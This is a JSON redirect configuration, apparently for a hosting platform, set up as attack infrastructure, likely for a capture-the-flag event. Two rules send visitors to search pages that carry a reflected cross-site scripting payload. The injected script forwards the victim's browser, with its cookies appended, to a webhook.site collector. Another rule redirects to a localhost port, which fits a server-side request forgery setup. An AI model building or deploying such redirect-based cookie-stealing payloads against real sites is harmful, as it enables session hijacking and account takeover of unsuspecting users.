{
  "redirects": [
    {
      "source":"/loopback_5000",
      "destination":"http://127.0.0.1:5000/"
    },
    {
      "source":"/nhnc2",
      "destination":"http://miday_revenge_aaaaa.nicewhite.eu.org:60005/search?search=\"><script>window.location=\"https://webhook.site/c0a1d835-d7e9-4dcc-add9-8c92f436e2a0/\"%2bdocument.cookie</script>"
    },
    {
      "source":"/nhnc",
      "destination":"http://miday_ahdnsivs.nicewhite.eu.org:60007/search?search=\"><script>window.location=\"https://webhook.site/c0a1d835-d7e9-4dcc-add9-8c92f436e2a0/\"%2bdocument.cookie</script>"
    },
    {
      "source": "/argsus",
      "destination": "https://solem.dev/argsus"
    },
    {
      "source": "/(.*)", 
      "destination": "https://solem.dev/hackers"
    }
  ]
}
